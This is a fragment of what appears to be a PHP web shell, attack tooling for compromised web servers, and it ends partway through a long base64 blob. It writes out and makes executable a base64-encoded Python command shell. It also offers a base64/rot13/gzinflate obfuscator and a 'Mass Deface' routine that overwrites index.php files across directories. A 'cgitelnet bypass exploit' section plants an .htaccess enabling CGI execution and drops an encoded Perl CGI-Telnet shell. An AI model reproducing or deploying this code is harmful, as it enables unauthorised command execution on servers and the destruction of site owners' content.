sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g\r\naXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs\r\ndWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu\r\nZy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g\r\nd2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg\r\naXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg\r\nICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk\r\nXSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt\r\nW2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv\r\ncm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg\r\nPSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y\r\nIGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg\r\nICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z\r\naGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+\r\nCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48\r\nST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl\r\ncnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs\r\nICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg\r\nQ29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr\r\nIHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1\r\ndCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5\r\nZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n\r\nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj\r\ncmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6\r\nIHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg\r\nICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs\r\nYW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt\r\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi\';\r\n\r\n$file = fopen("python.izo" ,"w+");\r\n$write = fwrite ($file ,base64_decode($pythonp));\r\nfclose($file);\r\n    chmod("python.izo",0755);\r\n   echo " <iframe src=python/python.izo width=96% height=76% frameborder=0></iframe>\r\n \r\n </div>"; }\r\n\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'string\')){\r\n$text = $_POST[\'code\'];\r\n?><center><br><br><b>+--=[ Script Encode & Decode ]=--+</b><br><br>\r\n<form method="post"><br><br><br>\r\n<textarea class=\'inputz\' cols=80 rows=10 name="code"></textarea><br><br>\r\n<select class=\'inputz\' size="1" name="ope">\r\n<option value="base64">Base64</option>\r\n<option value="gzinflate">str_rot13 - gzinflate - base64</option>\r\n<option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>\r\n</select>&nbsp;<input class=\'inputzbut\' type=\'submit\' name=\'submit\' value=\'Encrypt\'>\r\n<input class=\'inputzbut\' type=\'submit\' name=\'submits\' value=\'Decrypt\'>\r\n</form>\r\n\r\n<?php \r\n$submit = $_POST[\'submit\'];\r\nif (isset($submit)){\r\n$op = $_POST["ope"];\r\nswitch ($op) {case \'base64\': $codi=base64_encode($text);\r\nbreak;case \'str\' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));\r\nbreak;case \'gzinflate\' : $codi=base64_encode(gzdeflate(str_rot13($text)));\r\nbreak;default:break;}}\r\n\r\n$submit = $_POST[\'submits\'];\r\nif (isset($submit)){\r\n$op = $_POST["ope"];\r\nswitch ($op) {case \'base64\': $codi=base64_decode($text);\r\nbreak;case \'str\' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));\r\nbreak;case \'gzinflate\' : $codi=str_rot13(gzinflate(base64_decode($text)));\r\nbreak;default:break;}}\r\n\r\necho \'<textarea cols=80 rows=10 class="inputz" readonly>\'.$codi.\'</textarea></center><BR><BR>\';\r\n\r\n}\r\n\r\n/////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mass\'))\r\n{\r\necho "<center/><br/><b><font color=#00ff00>-=[ Mass Deface ]=-</font></b><br>";\r\nerror_reporting(0);?>\r\n<form ENCTYPE="multipart/form-data" action="<?php $_SERVER[\'PHP_SELF\']?>" method=\'post\'>\r\n<td><table><table class="tabnet" >\r\n<form hethot=\'post\'>\r\n<tr>\r\n\t<tr>\r\n\t<td>&nbsp;&nbsp;Folder</td><td><input class =\'inputz\' type=\'text\' name=\'path\' size=\'60\' value="<?php echo getcwd();?>"></td>\r\n\t</tr><br>\r\n\t<tr>\r\n\t<td>file name</td><td><input class =\'inputz\' type=\'text\' name=\'file\' size=\'60\' value="index.php"></td>\r\n\t</tr>\r\n</tr>\r\n<th colspan=\'2\'><b>Index code</b></th><br></table>\r\n<textarea style=\'background:black;outline:none;\' name=\'index\' rows=\'10\' cols=\'67\'>HACKED BY X\'1N73CT,PATCH YOUR SECURITY SYSTEM</textarea><br>\r\n<center><input class=\'inputzbut\' type=\'submit\' value="&nbsp;&nbsp;Deface&nbsp;&nbsp;"></center></form></table><br></form>\r\n\r\n<?php $mainpath=$_POST[path];$file=$_POST[file];$dir=opendir("$mainpath");$code=base64_encode($_POST[index]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$finish=@fwrite($start,$indx);if ($finish){echo "$row/$file > Done<br><br>";}}}\r\n\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'cgi\')) { \r\necho "<center/><br/><b><font color=blue>+--==[ cgitelnet.v1  Bypass Exploit]==--+ </font></b><br><br>";\r\n mkdir(\'cgitelnet1\', 0755);\r\n    chdir(\'cgitelnet1\');      \r\n        $kokdosya = ".htaccess";\r\n        $dosya_adi = "$kokdosya";\r\n        $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;&#305;lamad&#305;!");\r\n        $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI\r\n\r\nAddType application/x-httpd-cgi .cin\r\n\r\nAddHandler cgi-script .cin\r\nAddHandler cgi-script .cin";    \r\n        fwrite ( $dosya , $metin ) ;\r\n        fclose ($dosya);\r\n$cgishellizocin = \'IyEvdXNyL2Jpbi9wZXJsCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBDb3B5cmlnaHQgYW5kIExpY2VuY2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIENHSS1UZWxuZXQgVmVyc2lvbiAxLjAgZm9yIE5UIGFuZCBVbml4IDogUnVuIENvbW1hbmRzIG9uIHlvdXIgV2ViIFNlcnZlcgojCiMgQ29weXJpZ2h0IChDKSAyMDAxIFJvaGl0YWIgQmF0cmEKIyBQZXJtaXNzaW9uIGlzIGdyYW50ZWQgdG8gdXNlLCBkaXN0cmlidXRlIGFuZCBtb2RpZnkgdGhpcyBzY3JpcHQgc28gbG9uZwojIGFzIHRoaXMgY29weXJpZ2h0IG5vdGljZSBpcyBsZWZ0IGludGFjdC4gSWYgeW91IG1ha2UgY2hhbmdlcyB0byB0aGUgc2NyaXB0CiMgcGxlYXNlIGRvY3VtZW50IHRoZW0gYW5kIGluZm9ybSBtZS4gSWYgeW91IHdvdWxkIGxpa2UgYW55IGNoYW5nZXMgdG8gYmUgbWFkZQojIGluIHRoaXMgc2NyaXB0LCB5b3UgY2FuIGUtbWFpbCBtZS4KIwojIEF1dGhvcjogUm9oaXRhYiBCYXRyYQojIEF1dGhvciBlLW1haWw6IHJvaGl0YWJAcm9oaXRhYi5jb20KIyBBdXRob3IgSG9tZXBhZ2U6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vCiMgU2NyaXB0IEhvbWVwYWdlOiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL2NnaXNjcmlwdHMvY2dpdGVsbmV0Lmh0bWwKIyBQcm9kdWN0IFN1cHBvcnQ6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vc3VwcG9ydC8KIyBEaXNjdXNzaW9uIEZvcnVtOiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL2Rpc2N1c3MvCiMgTWFpbGluZyBMaXN0OiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL21saXN0LwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgSW5zdGFsbGF0aW9uCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUbyBpbnN0YWxsIHRoaXMgc2NyaXB0CiMKIyAxLiBNb2RpZnkgdGhlIGZpcnN0IGxpbmUgIiMhL3Vzci9iaW4vcGVybCIgdG8gcG9pbnQgdG8gdGhlIGNvcnJlY3QgcGF0aCBvbgojICAgIHlvdXIgc2VydmVyLiBGb3IgbW9zdCBzZXJ2ZXJzLCB5b3UgbWF5IG5vdCBuZWVkIHRvIG1vZGlmeSB0aGlzLgojIDIuIENoYW5nZSB0aGUgcGFzc3dvcmQgaW4gdGhlIENvbmZpZ3VyYXRpb24gc2VjdGlvbiBiZWxvdy4KIyAzLiBJZiB5b3UncmUgcnVubmluZyB0aGUgc2NyaXB0IHVuZGVyIFdpbmRvd3MgTlQsIHNldCAkV2luTlQgPSAxIGluIHRoZQojICAgIENvbmZpZ3VyYXRpb24gU2VjdGlvbiBiZWxvdy4KIyA0LiBVcGxvYWQgdGhlIHNjcmlwdCB0byBhIGRpcmVjdG9yeSBvbiB5b3VyIHNlcnZlciB3aGljaCBoYXMgcGVybWlzc2lvbnMgdG8KIyAgICBleGVjdXRlIENHSSBzY3JpcHRzLiBUaGlzIGlzIHVzdWFsbHkgY2dpLWJpbi4gTWFrZSBzdXJlIHRoYXQgeW91IHVwbG9hZAojICAgIHRoZSBzY3JpcHQgaW4gQVNDSUkgbW9kZS4KIyA1LiBDaGFuZ2UgdGhlIHBlcm1pc3Npb24gKENITU9EKSBvZiB0aGUgc2NyaXB0IHRvIDc1NS4KIyA2LiBPcGVuIHRoZSBzY3JpcHQgaW4geW91ciB3ZWIgYnJvd3Nlci4gSWYgeW91IHVwbG9hZGVkIHRoZSBzY3JpcHQgaW4KIyAgICBjZ2ktYmluLCB0aGlzIHNob3VsZCBiZSBodHRwOi8vd3d3LnlvdXJzZXJ2ZXIuY29tL2NnaS1iaW4vY2dpdGVsbmV0LnBsCiMgNy4gTG9naW4gdXNpbmcgdGhlIHBhc3N3b3JkIHRoYXQgeW91IHNwZWNpZmllZCBpbiBTdGVwIDIuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBDb25maWd1cmF0aW9uOiBZb3UgbmVlZCB0byBjaGFuZ2Ugb25seSAkUGFzc3dvcmQgYW5kICRXaW5OVC4gVGhlIG90aGVyCiMgdmFsdWVzIHNob3VsZCB3b3JrIGZpbmUgZm9yIG1vc3Qgc3lzdGVtcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQokUGFzc3dvcmQgPSAiMTIzNDU2IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4KCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2UgdGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZgoJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQKCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91CgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuCgokTlRDbWRTZXAgPSAiJiI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULgoKJFVuaXhDbWRTZXAgPSAiOyI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4LgoKJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gPSAxMDsJIyBUaW1lIGluIHNlY29uZHMgYWZ0ZXIgY29tbWFuZHMgd2lsbCBiZSBraWxsZWQKCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzCgkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkjIHRha2UgdmVyeSBsb25nIHRvIGV4ZWN1dGUsIGxpa2UgImZpbmQgLyIuCgkJCQkjIFRoaXMgaXMgdmFsaWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzCgkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4KCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRhIGlzIHNlbnQgdG8gdGhlCgkJCQkjIGJyb3dzZXIgYXMgc29vbiBhcyBpdCBpcyBvdXRwdXQsIG90aGVyd2lzZQoJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kCgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UKCQkJCSMgcGluZywgc28gdGhhdCB5b3UgY2FuIHNlZSB0aGUgb3V0cHV0IGFzIGl0CgkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4KCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISEKCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOwokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7CiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOwokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOwoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJzZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQKIyBwYXJzZXMgR0VULCBQT1NUIGFuZCBtdWx0aXBhcnQvZm9ybS1kYXRhIHRoYXQgaXMgdXNlZCBmb3IgdXBsb2FkaW5nIGZpbGVzLgojIFRoZSBmaWxlbmFtZSBpcyBzdG9yZWQgaW4gJGlueydmJ30gYW5kIHRoZSBkYXRhIGlzIHN0b3JlZCBpbiAkaW57J2ZpbGVkYXRhJ30uCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAkaW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YKIyB0aGUgdmFyaWFibGUuIE5vdGU6IE1vc3Qgb2YgdGhlIGNvZGUgaW4gdGhpcyBmdW5jdGlvbiBpcyB0YWtlbiBmcm9tIG90aGVyIENHSQojIHNjcmlwdHMuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFJlYWRQYXJzZSAKewoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsKCWxvY2FsICgkaSwgJGxvYywgJGtleSwgJHZhbCk7CgkKCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOwoKCWlmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIkdFVCIpCgl7CgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307Cgl9CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikKCXsKCQliaW5tb2RlKFNURElOKSBpZiAkTXVsdGlwYXJ0Rm9ybURhdGEgJiAkV2luTlQ7CgkJcmVhZChTVERJTiwgJGluLCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsKCX0KCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBkYXRhCglpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykKCXsKCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZlciB0byBSRkMxODY3IAoJCUBsaXN0ID0gc3BsaXQoLyRCb3VuZGFyeS8sICRpbik7IAoJCSRIZWFkZXJCb2R5ID0gJGxpc3RbMV07CgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOwoJCSRIZWFkZXIgPSAkYDsKCQkkQm9keSA9ICQnOwogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMgdGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlCgkJJGlueydmaWxlZGF0YSd9ID0gJEJvZHk7CgkJJEhlYWRlciA9fiAvZmlsZW5hbWU9XCIoLispXCIvOyAKCQkkaW57J2YnfSA9ICQxOyAKCQkkaW57J2YnfSA9fiBzL1wiLy9nOwoJCSRpbnsnZid9ID1+IHMvXHMvL2c7CgoJCSMgcGFyc2UgdHJhaWxlcgoJCWZvcigkaT0yOyAkbGlzdFskaV07ICRpKyspCgkJeyAKCQkJJGxpc3RbJGldID1+IHMvXi4rbmFtZT0kLy87CgkJCSRsaXN0WyRpXSA9fiAvXCIoXHcrKVwiLzsKCQkJJGtleSA9ICQxOwoJCQkkdmFsID0gJCc7CgkJCSR2YWwgPX4gcy8oXihcclxuXHJcbnxcblxuKSl8KFxyXG4kfFxuJCkvL2c7CgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7CgkJCSRpbnska2V5fSA9ICR2YWw7IAoJCX0KCX0KCWVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQoJewoJCUBpbiA9IHNwbGl0KC8mLywgJGluKTsKCQlmb3JlYWNoICRpICgwIC4uICQjaW4pCgkJewoJCQkkaW5bJGldID1+IHMvXCsvIC9nOwoJCQkoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOwoJCQkka2V5ID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsKCQkJJGlueyRrZXl9IC49ICR2YWw7CgkJfQoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIFBhZ2UgSGVhZGVyCiMgQXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludFBhZ2VIZWFkZXIKewoJJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7CgkkRW5jb2RlZEN1cnJlbnREaXIgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOwoJcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7CglwcmludCA8PEVORDsKPGh0bWw+CjxoZWFkPgo8dGl0bGU+Q0dJLVRlbG5ldCBWZXJzaW9uIDEuMDwvdGl0bGU+CiRIdG1sTWV0YUhlYWRlcgo8L2hlYWQ+Cjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5mb2N1cygpIiBiZ2NvbG9yPSIjMDAwMDAwIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1hcmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiPgo8dGFibGUgYm9yZGVyPSIxIiB3aWR0aD0iMTAwJSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIyIj4KPHRyPgo8dGQgYmdjb2xvcj0iI0MyQkZBNSIgYm9yZGVyY29sb3I9IiMwMDAwODAiIGFsaWduPSJjZW50ZXIiPgo8Yj48Zm9udCBjb2xvcj0iIzAwMDA4MCIgc2l6ZT0iMiI+IzwvZm9udD48L2I+PC90ZD4KPHRkIGJnY29sb3I9IiMwMDAwODAiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiIGNvbG9yPSIjRkZGRkZGIj48Yj5DR0ktVGVsbmV0IFZlcnNpb24gMS4wIC0gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9udD48L3RkPgo8L3RyPgo8dHI+Cjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjQzJCRkE1Ij48Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5EaXNjb25uZWN0PC9hPiB8CjxhIGhyZWY9Imh0dHA6Ly93d3cucm9oaXRhYi5jb20vY2dpc2NyaXB0cy9jZ2l0ZWxuZXQuaHRtbCI+SGVscDwvYT4KPC9mb250PjwvdGQ+CjwvdHI+CjwvdGFibGU+Cjxmb250IGNvbG9yPSIjQzBDMEMwIiBzaXplPSIzIj4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luU2NyZWVuCnsKCSRNZXNzYWdlID0gcSQ8cHJlPjxmb250IGNvbG9yPSIjNjY5OTk5Ij4gX19fX18gIF9fX19fICBfX19fXyAgICAgICAgICBfX19fXyAgICAgICAgXyAgICAgICAgICAgICAgIF8KLyAgX18gXHwgIF9fIFx8XyAgIF98ICAgICAgICB8XyAgIF98ICAgICAgfCB8ICAgICAgICAgICAgIHwgfAp8IC8gIFwvfCB8ICBcLyAgfCB8ICAgX19fX19fICAgfCB8ICAgIF9